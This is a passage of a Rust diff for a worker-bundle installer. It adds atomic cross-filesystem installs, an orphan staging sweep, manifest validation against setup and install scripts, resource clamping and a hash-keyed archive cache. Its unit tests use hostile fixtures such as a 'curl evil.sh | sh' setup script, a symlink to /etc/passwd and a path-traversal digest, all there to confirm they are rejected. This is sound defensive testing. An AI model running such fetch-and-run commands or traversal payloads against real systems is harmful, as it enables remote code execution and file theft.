+            // Cross-fs path: copy into a sibling of `final_dir` first,
+            // then rename. This keeps the final rename inside one
+            // filesystem (the bundle root's parent) so it stays atomic;
+            // a partial copy can never poison `final_dir`.
+            let partial = sibling_partial_dir(&final_dir);
+            // If a prior crashed install left a stale `*.partial.*`
+            // sibling, sweep it before we begin. Best-effort — if remove
+            // fails we'll surface the copy error below.
+            let _ = std::fs::remove_dir_all(&partial);
+
+            if let Err(source) = copy_dir_tree(staging_dir, &partial) {
+                // Roll back the partial sibling so the next install
+                // attempt starts clean. The staging dir is left intact
+                // for the StagingGuard to clean.
+                let _ = std::fs::remove_dir_all(&partial);
+                return Err(WorkerOpError::ConfigIo {
+                    path: partial,
+                    source,
+                });
+            }
+
+            // Same-filesystem rename: this either succeeds atomically
+            // or fails without leaving `final_dir` in a half-state.
+            if let Err(source) = std::fs::rename(&partial, &final_dir) {
+                let _ = std::fs::remove_dir_all(&partial);
+                return Err(WorkerOpError::ConfigIo {
+                    path: final_dir,
+                    source,
+                });
+            }
+
+            // Final step: tidy the now-redundant staging dir. The
+            // StagingGuard would also do this on Drop, but doing it
+            // here keeps the disk state predictable for the caller.
+            let _ = std::fs::remove_dir_all(staging_dir);
+            Ok(final_dir)
+        }
+        Err(source) => Err(WorkerOpError::ConfigIo {
+            path: final_dir,
+            source,
+        }),
+    }
+}
+
+/// Builds a sibling path next to `final_dir` for the cross-fs copy
+/// staging area. Lives in the same parent directory so the subsequent
+/// rename into `final_dir` is a same-filesystem atomic rename.
+fn sibling_partial_dir(final_dir: &Path) -> PathBuf {
+    use std::sync::atomic::{AtomicU64, Ordering};
+    use std::time::{SystemTime, UNIX_EPOCH};
+    static COUNTER: AtomicU64 = AtomicU64::new(0);
+    let counter = COUNTER.fetch_add(1, Ordering::Relaxed);
+    let ts = SystemTime::now()
+        .duration_since(UNIX_EPOCH)
+        .map(|d| d.as_nanos())
+        .unwrap_or(0);
+    let file_name = final_dir
+        .file_name()
+        .and_then(|os| os.to_str())
+        .unwrap_or("bundle");
+    let sibling_name = format!("{file_name}.partial.{ts}.{counter}");
+    final_dir.with_file_name(sibling_name)
+}
+
+fn cross_device_or_busy(e: &std::io::Error) -> bool {
+    // EXDEV = 18 on Linux; on macOS as well.
+    matches!(e.raw_os_error(), Some(18) | Some(16))
+}
+
+/// Recursively copies `src` into `dst`, creating `dst` if needed.
+///
+/// Does NOT delete `src`. The cross-fs install pipeline relies on the
+/// caller to remove `src` (the staging dir) only after the partial
+/// sibling has been atomically renamed into `final_dir`. Keeping the
+/// delete separate lets us roll the partial sibling back on copy
+/// failure without losing the staging contents.
+fn copy_dir_tree(src: &Path, dst: &Path) -> std::io::Result<()> {
+    std::fs::create_dir_all(dst)?;
+    for entry in std::fs::read_dir(src)? {
+        let entry = entry?;
+        let ft = entry.file_type()?;
+        let s = entry.path();
+        let d = dst.join(entry.file_name());
+        if ft.is_dir() {
+            copy_dir_tree(&s, &d)?;
+        } else if ft.is_file() {
+            std::fs::copy(&s, &d)?;
+        } else {
+            // We pre-validated entries in extract; nothing else should
+            // ever appear here. If it does, refuse — better to fail the
+            // install than carry a surprise into the bundle root.
+            return Err(std::io::Error::other(format!(
+                "unsupported file type during cross-device install: {}",
+                s.display()
+            )));
+        }
+    }
+    Ok(())
+}
+
+/// Startup-time orphan sweep.
+///
+/// The RAII `StagingGuard` cleans up staging directories on graceful
+/// drop. It cannot run if the process was killed (SIGKILL, OOM, host
+/// power cut). On engine/CLI startup we walk the staging root and
+/// remove anything that satisfies BOTH of the following:
+///
+///   * The directory is older than `MIN_STAGING_AGE_SECS` (defensive
+///     against a fresh install whose mtime is updated less often than
+///     bytes are written).
+///   * The corresponding per-worker fslock is acquirable as a
+///     non-blocking try-lock. A live holder ALWAYS has the lock held,
+///     so a successful try-lock proves no install is in flight.
+///
+/// The lock check closes the bug where a slow 64 MiB download on a
+/// 1 Mbps link took ~9 minutes and a sibling `iii worker list`
+/// invocation's `sweep_orphans` deleted the in-flight staging dir.
+///
+/// Best-effort: returns the number of directories removed; logs but
+/// does not propagate per-directory errors.
+pub fn sweep_orphans() -> usize {
+    const MIN_STAGING_AGE_SECS: u64 = 60;
+    let root = bundle_staging_root();
+    let entries = match std::fs::read_dir(&root) {
+        Ok(e) => e,
+        Err(_) => return 0,
+    };
+    let mut removed = 0;
+    for entry in entries.flatten() {
+        let path = entry.path();
+        let metadata = match entry.metadata() {
+            Ok(m) => m,
+            Err(_) => continue,
+        };
+        if !metadata.is_dir() {
+            continue;
+        }
+        let age = metadata
+            .modified()
+            .ok()
+            .and_then(|m| m.elapsed().ok())
+            .map(|d| d.as_secs())
+            .unwrap_or(u64::MAX);
+        if age < MIN_STAGING_AGE_SECS {
+            continue;
+        }
+
+        // Recover the worker name from the staging dir basename.
+        // `unique_staging_dir_name` formats `{name}-{ts}-{counter}` —
+        // the name MAY itself contain dashes (validate_worker_name
+        // permits `-` `_` `.` and alnum), so the safe split is on
+        // the LAST two `-` segments.
+        let basename = match path.file_name().and_then(|s| s.to_str()) {
+            Some(s) => s,
+            None => continue,
+        };
+        let worker_name = match strip_unique_suffix(basename) {
+            Some(n) => n,
+            None => continue,
+        };
+
+        // Acquire the per-worker lock non-blocking. If it's held, a
+        // live install owns the staging dir — leave it alone.
+        let lock_path = lock_path_for(worker_name);
+        let mut lock = match fslock::LockFile::open(&lock_path) {
+            Ok(l) => l,
+            Err(_) => continue,
+        };
+        let acquired = match lock.try_lock_with_pid() {
+            Ok(true) => true,
+            Ok(false) => false,
+            Err(_) => false,
+        };
+        if !acquired {
+            tracing::debug!(
+                staging = %path.display(),
+                worker = %worker_name,
+                "skipping sweep: lock held by live install"
+            );
+            continue;
+        }
+        // Release the lock immediately so the legitimate install path
+        // can acquire it. `LockFile::unlock` returns Result; on error
+        // the lock will release when the LockFile drops anyway.
+        let _ = lock.unlock();
+
+        match std::fs::remove_dir_all(&path) {
+            Ok(()) => {
+                tracing::info!(staging = %path.display(), "swept orphan bundle staging dir");
+                removed += 1;
+            }
+            Err(e) => {
+                tracing::warn!(
+                    staging = %path.display(),
+                    error = %e,
+                    "failed to sweep orphan bundle staging dir"
+                );
+            }
+        }
+    }
+    removed
+}
+
+/// Strip the `-{ts}-{counter}` suffix from a unique staging dir name to
+/// recover the worker name. Returns `None` if the format doesn't match.
+fn strip_unique_suffix(basename: &str) -> Option<&str> {
+    let last_dash = basename.rfind('-')?;
+    let prefix = &basename[..last_dash];
+    let penultimate_dash = prefix.rfind('-')?;
+    Some(&basename[..penultimate_dash])
+}
+
+pub fn validate_bundle_manifest(
+    manifest_dir: &std::path::Path,
+    expected_name: &str,
+) -> Result<String, WorkerOpError> {
+    let manifest_path = manifest_dir.join("iii.worker.yaml");
+    // Cap manifest size BEFORE the read so a publisher-controlled
+    // billion-laughs YAML (chained `&anchor` / `*alias` expansion) can
+    // never reach serde_yaml::from_str. serde_yaml 0.9.x is libyaml-
+    // based and does not gate exponential alias expansion in-tree.
+    // 64 KiB is plenty for a real manifest and bounds worst-case
+    // expansion to a few MiB.
+    match std::fs::metadata(&manifest_path) {
+        Ok(meta) if meta.len() > MAX_BUNDLE_MANIFEST_BYTES => {
+            return Err(WorkerOpError::BundleManifestRejected {
+                field: "iii.worker.yaml".into(),
+                reason: format!(
+                    "manifest is {} bytes; bundle manifests are capped at {} bytes \
+                     (billion-laughs YAML defense)",
+                    meta.len(),
+                    MAX_BUNDLE_MANIFEST_BYTES,
+                ),
+            });
+        }
+        Ok(_) => {}
+        Err(source) if source.kind() == std::io::ErrorKind::NotFound => {
+            return Err(WorkerOpError::BundleManifestRejected {
+                field: "iii.worker.yaml".into(),
+                reason: "manifest must exist at archive root".into(),
+            });
+        }
+        Err(source) => {
+            return Err(WorkerOpError::ConfigIo {
+                path: manifest_path,
+                source,
+            });
+        }
+    }
+
+    let content = match std::fs::read_to_string(&manifest_path) {
+        Ok(c) => c,
+        Err(source) if source.kind() == std::io::ErrorKind::NotFound => {
+            return Err(WorkerOpError::BundleManifestRejected {
+                field: "iii.worker.yaml".into(),
+                reason: "manifest must exist at archive root".into(),
+            });
+        }
+        Err(source) => {
+            return Err(WorkerOpError::ConfigIo {
+                path: manifest_path,
+                source,
+            });
+        }
+    };
+
+    let doc: serde_yaml::Value =
+        serde_yaml::from_str(&content).map_err(|e| WorkerOpError::ConfigParse {
+            path: manifest_path.clone(),
+            message: format!("invalid YAML: {e}"),
+        })?;
+
+    // name must equal the install target.
+    let manifest_name = doc
+        .get("name")
+        .and_then(|v| v.as_str())
+        .map(str::trim)
+        .filter(|s| !s.is_empty());
+    match manifest_name {
+        Some(n) if n == expected_name => {}
+        Some(other) => {
+            return Err(WorkerOpError::BundleManifestRejected {
+                field: "name".into(),
+                reason: format!(
+                    "manifest declares name {other:?} but installing as {expected_name:?}"
+                ),
+            });
+        }
+        None => {
+            return Err(WorkerOpError::BundleManifestRejected {
+                field: "name".into(),
+                reason: "manifest must declare `name` matching the install target".into(),
+            });
+        }
+    }
+
+    // Reject runtime.base_image. Bundles use the engine-allowlisted
+    // base image, not whatever the publisher picks.
+    if doc
+        .get("runtime")
+        .and_then(|r| r.get("base_image"))
+        .is_some()
+    {
+        return Err(WorkerOpError::BundleManifestRejected {
+            field: "runtime.base_image".into(),
+            reason: "bundle workers cannot override the base image; \
+                     use a binary or OCI worker if you need a custom rootfs"
+                .into(),
+        });
+    }
+
+    // Reject scripts.setup and scripts.install — they would execute
+    // publisher-supplied shell during install.
+    if let Some(scripts) = doc.get("scripts") {
+        if scripts
+            .get("setup")
+            .and_then(|v| v.as_str())
+            .map(str::trim)
+            .is_some_and(|s| !s.is_empty())
+        {
+            return Err(WorkerOpError::BundleManifestRejected {
+                field: "scripts.setup".into(),
+                reason: "bundle manifests must not declare scripts.setup; \
+                         pre-build the bundle and ship it ready-to-run"
+                    .into(),
+            });
+        }
+        if scripts
+            .get("install")
+            .and_then(|v| v.as_str())
+            .map(str::trim)
+            .is_some_and(|s| !s.is_empty())
+        {
+            return Err(WorkerOpError::BundleManifestRejected {
+                field: "scripts.install".into(),
+                reason: "bundle manifests must not declare scripts.install; \
+                         vendor dependencies into the bundle"
+                    .into(),
+            });
+        }
+    }
+
+    // scripts.start is the only command we will execute. Must be a
+    // non-empty shell string (matches existing local-worker rails —
+    // see project.rs::load_project_info around scripts.start).
+    let start = doc
+        .get("scripts")
+        .and_then(|s| s.get("start"))
+        .and_then(|v| v.as_str())
+        .map(str::trim)
+        .filter(|s| !s.is_empty());
+    match start {
+        Some(cmd) => Ok(cmd.to_string()),
+        None => Err(WorkerOpError::BundleManifestRejected {
+            field: "scripts.start".into(),
+            reason: "bundle manifest must declare scripts.start as a non-empty \
+                     shell string (e.g. \"node bundle.js\")"
+                .into(),
+        }),
+    }
+}
+
+/// Default resource ceilings applied to bundle workers when the engine
+/// does not provide an explicit cap. Tuned to fit on a developer laptop
+/// without letting a single bundle starve the host.
+///
+/// These mirror the `PerImageCap` semantics in `sandbox_daemon::config`
+/// but live here because bundle workers don't (yet) carry an explicit
+/// base-image declaration the engine can key on. A future engine-level
+/// cap can shadow this default if operators want something tighter or
+/// looser.
+pub const DEFAULT_BUNDLE_MAX_CPUS: u32 = 4;
+pub const DEFAULT_BUNDLE_MAX_MEMORY_MB: u32 = 4096;
+
+/// Default resources requested when a bundle manifest is silent on
+/// `resources.cpus` or `resources.memory`. Matches the local-path
+/// defaults so existing publishers don't have to think about it.
+const DEFAULT_BUNDLE_CPUS: u32 = 2;
+const DEFAULT_BUNDLE_MEMORY_MB: u32 = 2048;
+
+/// Caps that bundle workers are clamped against. T10 will let the
+/// engine override these via config; for now they're the defaults.
+#[derive(Debug, Clone, Copy)]
+pub struct ResourceCaps {
+    pub max_cpus: u32,
+    pub max_memory_mb: u32,
+}
+
+impl Default for ResourceCaps {
+    fn default() -> Self {
+        Self {
+            max_cpus: DEFAULT_BUNDLE_MAX_CPUS,
+            max_memory_mb: DEFAULT_BUNDLE_MAX_MEMORY_MB,
+        }
+    }
+}
+
+/// Outcome of bundle resource parsing. The `clamped_*` fields are
+/// non-empty when the publisher requested more than the engine allows;
+/// callers should emit a WARN event so the operator sees what happened
+/// rather than silently shrinking the worker (Prime Directive: zero
+/// silent failures).
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct ResolvedBundleResources {
+    pub cpus: u32,
+    pub memory_mb: u32,
+    /// Non-`None` when `resources.cpus` exceeded `caps.max_cpus`. Carries
+    /// the original request so the WARN message can name it.
+    pub clamped_cpus: Option<u32>,
+    /// Non-`None` when `resources.memory` exceeded `caps.max_memory_mb`.
+    pub clamped_memory_mb: Option<u32>,
+}
+
+pub fn parse_bundle_resources(
+    manifest_dir: &std::path::Path,
+    caps: ResourceCaps,
+) -> Result<ResolvedBundleResources, WorkerOpError> {
+    let manifest_path = manifest_dir.join("iii.worker.yaml");
+    // Same billion-laughs defense as validate_bundle_manifest: refuse
+    // to even read a manifest larger than MAX_BUNDLE_MANIFEST_BYTES.
+    if let Ok(meta) = std::fs::metadata(&manifest_path)
+        && meta.len() > MAX_BUNDLE_MANIFEST_BYTES
+    {
+        return Err(WorkerOpError::BundleManifestRejected {
+            field: "iii.worker.yaml".into(),
+            reason: format!(
+                "manifest is {} bytes; bundle manifests are capped at {} bytes \
+                 (billion-laughs YAML defense)",
+                meta.len(),
+                MAX_BUNDLE_MANIFEST_BYTES,
+            ),
+        });
+    }
+    let content =
+        std::fs::read_to_string(&manifest_path).map_err(|source| WorkerOpError::ConfigIo {
+            path: manifest_path.clone(),
+            source,
+        })?;
+    let doc: serde_yaml::Value =
+        serde_yaml::from_str(&content).map_err(|e| WorkerOpError::ConfigParse {
+            path: manifest_path,
+            message: format!("invalid YAML in resources block: {e}"),
+        })?;
+
+    fn read_u32(doc: &serde_yaml::Value, key: &str, default: u32) -> u32 {
+        match doc
+            .get("resources")
+            .and_then(|r| r.get(key))
+            .and_then(|v| v.as_u64())
+        {
+            Some(n) if n <= u32::MAX as u64 => n as u32,
+            Some(_overflow) => u32::MAX,
+            None => default,
+        }
+    }
+
+    let requested_cpus = read_u32(&doc, "cpus", DEFAULT_BUNDLE_CPUS);
+    let requested_memory = read_u32(&doc, "memory", DEFAULT_BUNDLE_MEMORY_MB);
+
+    let (cpus, clamped_cpus) = if requested_cpus > caps.max_cpus {
+        (caps.max_cpus, Some(requested_cpus))
+    } else {
+        (requested_cpus, None)
+    };
+    let (memory_mb, clamped_memory_mb) = if requested_memory > caps.max_memory_mb {
+        (caps.max_memory_mb, Some(requested_memory))
+    } else {
+        (requested_memory, None)
+    };
+
+    Ok(ResolvedBundleResources {
+        cpus,
+        memory_mb,
+        clamped_cpus,
+        clamped_memory_mb,
+    })
+}
+
+/// Total disk budget for the bundle archive cache, in bytes. The
+/// cache holds verified tar.gz blobs keyed by SHA-256 so re-installs
+/// of the same `name@version` skip the network entirely. LRU eviction
+/// drives the cache back under this limit on every successful insert.
+pub const BUNDLE_CACHE_MAX_BYTES: u64 = 1024 * 1024 * 1024;
+
+/// Returns the cache directory: `~/.iii/cache/bundles/`.
+pub fn bundle_cache_dir() -> PathBuf {
+    dirs::home_dir()
+        .unwrap_or_default()
+        .join(".iii")
+        .join("cache")
+        .join("bundles")
+}
+
+/// Returns the cache filename for a given SHA-256 hex digest.
+///
+/// The digest is the cache key: identical bytes have identical digests
+/// regardless of which `name@version` published them, so a single
+/// blob serves every install that points at the same archive.
+///
+/// The function rejects digests that are not 64 lowercase-hex characters,
+/// so a malformed registry response can never reach across the cache
+/// directory via a crafted filename like `../../etc/passwd`.
+pub fn cached_archive_path(sha256_hex: &str) -> Option<PathBuf> {
+    let trimmed = sha256_hex.trim();
+    if trimmed.len() != 64 || !trimmed.chars().all(|c| c.is_ascii_hexdigit()) {
+        return None;
+    }
+    Some(bundle_cache_dir().join(format!("{}.tar.gz", trimmed.to_ascii_lowercase())))
+}
+
+/// Returns the cached archive path if the cache holds a blob whose
+/// recomputed SHA-256 matches `expected_sha256_hex`. Hash mismatches
+/// (cache corruption, e.g. partial write on power cut) cause the
+/// cached blob to be removed and `None` returned so the install path
+/// falls back to a fresh download.
+///
+/// On hit, touches the file's mtime to mark recent use (LRU input).
+pub fn lookup_cached_archive(expected_sha256_hex: &str) -> Option<PathBuf> {
+    let path = cached_archive_path(expected_sha256_hex)?;
+    if !path.is_file() {
+        return None;
+    }
+
+    use sha2::{Digest, Sha256};
+    use std::io::Read as _;
+
+    let mut file = match std::fs::File::open(&path) {
+        Ok(f) => f,
+        Err(_) => return None,
+    };
+    let mut hasher = Sha256::new();
+    let mut buf = [0u8; 64 * 1024];
+    loop {
+        let n = match file.read(&mut buf) {
+            Ok(0) => break,
+            Ok(n) => n,
+            Err(_) => return None,
+        };
+        hasher.update(&buf[..n]);
+    }
+    let actual = format!("{:x}", hasher.finalize());
+    if !actual.eq_ignore_ascii_case(expected_sha256_hex.trim()) {
+        tracing::warn!(
+            cache.path = %path.display(),
+            cache.expected_sha256 = %expected_sha256_hex,
+            cache.actual_sha256 = %actual,
+            "bundle.cache.miss_corrupt"
+        );
+        let _ = std::fs::remove_file(&path);
+        return None;
+    }
+
+    // Touch mtime to mark recent use. Best-effort; failure here does
+    // not invalidate the hit.
+    if let Ok(metadata) = file.metadata() {
+        let now = std::time::SystemTime::now();
+        let _ = filetime_touch(&path, now, metadata);
+    }
+    Some(path)
+}
+
+/// Updates `path`'s mtime to `now` so LRU eviction reflects real
+/// recency-of-use rather than initial-write time. Atime is intentionally
+/// touched too on hosts where the platform supports it; some mounts
+/// (e.g. `noatime`) silently ignore atime updates, which is fine.
+///
+/// `_metadata` is accepted for API symmetry with the previous no-op
+/// signature; the underlying syscall does not need it.
+///
+/// Best-effort: a failure here just means the LRU stays slightly stale
+/// for this entry. We log and move on.
+fn filetime_touch(
+    path: &Path,
+    now: std::time::SystemTime,
+    _metadata: std::fs::Metadata,
+) -> std::io::Result<()> {
+    let ft = filetime::FileTime::from_system_time(now);
+    filetime::set_file_times(path, ft, ft)
+}
+
+/// Inserts `archive_path`'s contents into the cache under
+/// `<sha256>.tar.gz`. The caller has already verified the sha256, so
+/// this function trusts the digest and copies the bytes; if the
+/// destination already exists it is a no-op (cache is keyed by hash,
+/// so identical bytes are already there).
+///
+/// After insert, drives LRU eviction back under `BUNDLE_CACHE_MAX_BYTES`.
+/// Failures during evict are logged but never fail the parent install.
+pub fn store_in_cache(archive_path: &Path, sha256_hex: &str) -> std::io::Result<()> {
+    let Some(dst) = cached_archive_path(sha256_hex) else {
+        // Don't fail the install — caching is a best-effort optimization.
+        tracing::warn!(
+            cache.sha256 = %sha256_hex,
+            "bundle.cache.skip_invalid_digest"
+        );
+        return Ok(());
+    };
+    if dst.exists() {
+        return Ok(());
+    }
+    std::fs::create_dir_all(bundle_cache_dir())?;
+    // Use copy + rename so a partial write never leaves a hash-named
+    // file with the wrong contents in place.
+    let tmp = dst.with_extension("tar.gz.partial");
+    std::fs::copy(archive_path, &tmp)?;
+    std::fs::rename(&tmp, &dst)?;
+    let _ = evict_cache_to_limit(BUNDLE_CACHE_MAX_BYTES);
+    Ok(())
+}
+
+/// LRU eviction: while the total cache size exceeds `limit_bytes`,
+/// removes the file with the oldest mtime. Best-effort — errors during
+/// directory scan or file removal are logged but never propagated.
+pub fn evict_cache_to_limit(limit_bytes: u64) -> std::io::Result<()> {
+    let dir = bundle_cache_dir();
+    if !dir.is_dir() {
+        return Ok(());
+    }
+    loop {
+        let mut entries: Vec<(PathBuf, u64, std::time::SystemTime)> = Vec::new();
+        let mut total: u64 = 0;
+        for entry in std::fs::read_dir(&dir)? {
+            let entry = entry?;
+            let metadata = match entry.metadata() {
+                Ok(m) => m,
+                Err(_) => continue,
+            };
+            if !metadata.is_file() {
+                continue;
+            }
+            let size = metadata.len();
+            let modified = metadata.modified().unwrap_or(std::time::UNIX_EPOCH);
+            entries.push((entry.path(), size, modified));
+            total = total.saturating_add(size);
+        }
+        if total <= limit_bytes {
+            return Ok(());
+        }
+        // Sort oldest-first.
+        entries.sort_by_key(|(_, _, m)| *m);
+        let Some((victim, victim_size, _)) = entries.into_iter().next() else {
+            return Ok(());
+        };
+        match std::fs::remove_file(&victim) {
+            Ok(()) => {
+                tracing::info!(
+                    cache.path = %victim.display(),
+                    cache.bytes_freed = victim_size,
+                    "bundle.cache.evict"
+                );
+            }
+            Err(e) => {
+                tracing::warn!(
+                    cache.path = %victim.display(),
+                    error = %e,
+                    "bundle.cache.evict_failed"
+                );
+                return Ok(()); // give up to avoid infinite loop on a stuck file
+            }
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::io::Write as _;
+
+    fn make_targz_in_memory(entries: &[(&str, &[u8], tar::EntryType)]) -> Vec<u8> {
+        use flate2::Compression;
+        use flate2::write::GzEncoder;
+
+        let mut encoder = GzEncoder::new(Vec::new(), Compression::default());
+        {
+            let mut archive = tar::Builder::new(&mut encoder);
+            for (path, content, kind) in entries {
+                let mut header = tar::Header::new_gnu();
+                header.set_path(path).unwrap();
+                header.set_size(content.len() as u64);
+                header.set_mode(0o644);
+                header.set_entry_type(*kind);
+                header.set_cksum();
+                archive.append(&header, *content as &[u8]).unwrap();
+            }
+            archive.finish().unwrap();
+        }
+        encoder.finish().unwrap()
+    }
+
+    #[test]
+    fn extract_accepts_regular_files_and_directories() {
+        let archive = make_targz_in_memory(&[
+            ("iii.worker.yaml", b"name: foo\n", tar::EntryType::Regular),
+            ("bundle.js", b"console.log('hi');", tar::EntryType::Regular),
+        ]);
+        let tmp = tempfile::tempdir().unwrap();
+        let archive_path = tmp.path().join("a.tar.gz");
+        std::fs::write(&archive_path, &archive).unwrap();
+        let dest = tmp.path().join("dest");
+        std::fs::create_dir_all(&dest).unwrap();
+
+        extract_bundle_safely_blocking(&archive_path, &dest).expect("happy-path extract");
+        assert!(dest.join("iii.worker.yaml").is_file());
+        assert!(dest.join("bundle.js").is_file());
+    }
+
+    #[test]
+    fn extract_rejects_symlink_entries() {
+        // Build a tar with a symlink entry directly (tar::Builder::append
+        // on a symlink path on disk would also work but is OS-coupled).
+        let mut raw = Vec::new();
+        {
+            let mut builder = tar::Builder::new(&mut raw);
+            let mut header = tar::Header::new_gnu();
+            header.set_path("link").unwrap();
+            header.set_entry_type(tar::EntryType::Symlink);
+            header.set_size(0);
+            header.set_link_name("/etc/passwd").expect("link name");
+            header.set_cksum();
+            builder.append(&header, &b""[..]).unwrap();
+            builder.finish().unwrap();
+        }
+        let mut gz = Vec::new();
+        {
+            use flate2::Compression;
+            use flate2::write::GzEncoder;
+            let mut enc = GzEncoder::new(&mut gz, Compression::default());
+            enc.write_all(&raw).unwrap();
+            enc.finish().unwrap();
+        }
+
+        let tmp = tempfile::tempdir().unwrap();
+        let archive_path = tmp.path().join("a.tar.gz");
+        std::fs::write(&archive_path, &gz).unwrap();
+        let dest = tmp.path().join("dest");
+        std::fs::create_dir_all(&dest).unwrap();
+
+        let err =
+            extract_bundle_safely_blocking(&archive_path, &dest).expect_err("symlink rejected");
+        match err {
+            WorkerOpError::BundleArchiveUnsafe { reason, .. } => {
+                assert!(reason.contains("Symlink") || reason.contains("entry type"));
+            }
+            other => panic!("expected BundleArchiveUnsafe, got {other:?}"),
+        }
+    }
+
+    // Note: `..` traversal coverage requires raw-tar-bytes construction
+    // (the tar crate's Builder rejects `..` paths at write time, so the
+    // attack archive cannot be built through the safe API). The
+    // adversarial path tests live in T12's bundle_worker_integration.rs
+    // which mirrors the raw-tar helper from binary_worker_integration.rs.
+
+    fn write_manifest(dir: &std::path::Path, body: &str) {
+        std::fs::write(dir.join("iii.worker.yaml"), body).unwrap();
+    }
+
+    #[test]
+    fn validate_bundle_manifest_happy_path() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(
+            tmp.path(),
+            "name: foo\nscripts:\n  start: \"node bundle.js\"\n",
+        );
+        let cmd = validate_bundle_manifest(tmp.path(), "foo").expect("happy");
+        assert_eq!(cmd, "node bundle.js");
+    }
+
+    #[test]
+    fn validate_bundle_manifest_rejects_setup() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(
+            tmp.path(),
+            "name: foo\nscripts:\n  setup: \"curl evil.sh | sh\"\n  start: \"node x.js\"\n",
+        );
+        match validate_bundle_manifest(tmp.path(), "foo") {
+            Err(WorkerOpError::BundleManifestRejected { field, .. }) => {
+                assert_eq!(field, "scripts.setup");
+            }
+            other => panic!("expected BundleManifestRejected scripts.setup, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn validate_bundle_manifest_rejects_install() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(
+            tmp.path(),
+            "name: foo\nscripts:\n  install: npm i\n  start: node x.js\n",
+        );
+        match validate_bundle_manifest(tmp.path(), "foo") {
+            Err(WorkerOpError::BundleManifestRejected { field, .. }) => {
+                assert_eq!(field, "scripts.install");
+            }
+            other => panic!("expected BundleManifestRejected scripts.install, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn validate_bundle_manifest_rejects_runtime_base_image() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(
+            tmp.path(),
+            "name: foo\nruntime:\n  base_image: evil/img:latest\nscripts:\n  start: node x.js\n",
+        );
+        match validate_bundle_manifest(tmp.path(), "foo") {
+            Err(WorkerOpError::BundleManifestRejected { field, .. }) => {
+                assert_eq!(field, "runtime.base_image");
+            }
+            other => panic!("expected BundleManifestRejected runtime.base_image, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn validate_bundle_manifest_rejects_name_mismatch() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(tmp.path(), "name: bar\nscripts:\n  start: node x.js\n");
+        match validate_bundle_manifest(tmp.path(), "foo") {
+            Err(WorkerOpError::BundleManifestRejected { field, .. }) => {
+                assert_eq!(field, "name");
+            }
+            other => panic!("expected BundleManifestRejected name, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn validate_bundle_manifest_missing_start() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(tmp.path(), "name: foo\n");
+        match validate_bundle_manifest(tmp.path(), "foo") {
+            Err(WorkerOpError::BundleManifestRejected { field, .. }) => {
+                assert_eq!(field, "scripts.start");
+            }
+            other => panic!("expected BundleManifestRejected scripts.start, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn validate_bundle_manifest_missing_file() {
+        let tmp = tempfile::tempdir().unwrap();
+        match validate_bundle_manifest(tmp.path(), "foo") {
+            Err(WorkerOpError::BundleManifestRejected { field, .. }) => {
+                assert_eq!(field, "iii.worker.yaml");
+            }
+            other => panic!("expected BundleManifestRejected iii.worker.yaml, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn parse_bundle_resources_uses_defaults_when_absent() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(tmp.path(), "name: foo\nscripts:\n  start: node x.js\n");
+        let res = parse_bundle_resources(tmp.path(), ResourceCaps::default()).unwrap();
+        assert_eq!(res.cpus, DEFAULT_BUNDLE_CPUS);
+        assert_eq!(res.memory_mb, DEFAULT_BUNDLE_MEMORY_MB);
+        assert!(res.clamped_cpus.is_none());
+        assert!(res.clamped_memory_mb.is_none());
+    }
+
+    #[test]
+    fn parse_bundle_resources_clamps_excessive_cpu() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(
+            tmp.path(),
+            "name: foo\nresources:\n  cpus: 64\n  memory: 2048\nscripts:\n  start: x\n",
+        );
+        let caps = ResourceCaps {
+            max_cpus: 4,
+            max_memory_mb: 4096,
+        };
+        let res = parse_bundle_resources(tmp.path(), caps).unwrap();
+        assert_eq!(res.cpus, 4);
+        assert_eq!(res.clamped_cpus, Some(64));
+        assert!(res.clamped_memory_mb.is_none());
+    }
+
+    #[test]
+    fn parse_bundle_resources_clamps_excessive_memory() {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(
+            tmp.path(),
+            "name: foo\nresources:\n  cpus: 2\n  memory: 262144\nscripts:\n  start: x\n",
+        );
+        let res = parse_bundle_resources(tmp.path(), ResourceCaps::default()).unwrap();
+        assert_eq!(res.cpus, 2);
+        assert_eq!(res.memory_mb, DEFAULT_BUNDLE_MAX_MEMORY_MB);
+        assert!(res.clamped_cpus.is_none());
+        assert_eq!(res.clamped_memory_mb, Some(262144));
+    }
+
+    #[test]
+    fn parse_bundle_resources_saturates_overflow_not_truncates() {
+        // `.as_u64() as u32` truncates a u64 value > u32::MAX into a
+        // small u32 silently. The strict parser saturates instead so
+        // the clamp step sees the over-the-limit value and surfaces
+        // it as `clamped_*`.
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(
+            tmp.path(),
+            "name: foo\nresources:\n  cpus: 4294967296\n  memory: 2048\nscripts:\n  start: x\n",
+        );
+        let res = parse_bundle_resources(tmp.path(), ResourceCaps::default()).unwrap();
+        assert_eq!(res.cpus, DEFAULT_BUNDLE_MAX_CPUS);
+        // u32::MAX is what the saturating cast produces; the clamp
+        // reports that value as the original request.
+        assert_eq!(res.clamped_cpus, Some(u32::MAX));
+    }
+
+    #[test]
+    fn cached_archive_path_rejects_short_digest() {
+        assert!(cached_archive_path("deadbeef").is_none());
+    }
+
+    #[test]
+    fn cached_archive_path_rejects_nonhex_digest() {
+        // 64 chars but a non-hex character mid-string.
+        let bad = format!("{}z{}", "a".repeat(32), "b".repeat(31));
+        assert_eq!(bad.len(), 64);
+        assert!(cached_archive_path(&bad).is_none());
+    }
+
+    #[test]
+    fn cached_archive_path_rejects_traversal_attempt() {
+        // Even with the right length, anything non-hex (like a slash)
+        // must be rejected so a hostile registry can't write outside
+        // the cache directory by smuggling `..` into the digest field.
+        let bad = "a".repeat(62) + "/x";
+        assert_eq!(bad.len(), 64);
